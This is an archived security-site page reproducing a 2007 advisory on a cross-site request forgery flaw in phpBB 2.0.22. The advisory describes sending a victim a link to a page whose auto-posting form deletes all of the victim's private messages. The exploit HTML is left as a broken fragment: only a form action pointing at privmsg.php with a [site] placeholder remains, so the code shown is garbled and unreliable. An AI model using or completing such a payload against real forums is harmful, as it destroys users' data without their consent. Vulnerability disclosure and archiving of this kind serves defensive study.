Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: bx1614.htm

phpBB 2.0.22 Remote PM Delete XSRF Vulnerability



phpBB 2.0.22 Remote PM Delete XSRF Vulnerability
phpBB 2.0.22 Remote PM Delete XSRF Vulnerability



################################################################
phpBB 2.0.22 Remote PM Delete XSRF Vulnerability               
by NBBN                        Type: Cross-Site Request Forgery
Founded: December 2007                                         
################################################################


An attacker can send a link via pm to a site with the follow html code to a 
victim and all victim's pm's are going to be deleted when he click the link. 
######Code##########################################################
 

  
  
  

action="http://[site]/phpBB2/privmsg.php?folder=inbox" method="post" name="xsrf"> ##################################################################### ######Vuln Versions:##################### I've tested it only on 2.0.22 but I think that all versions of 2 are vuln. (Sorry my bad english :-) )


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH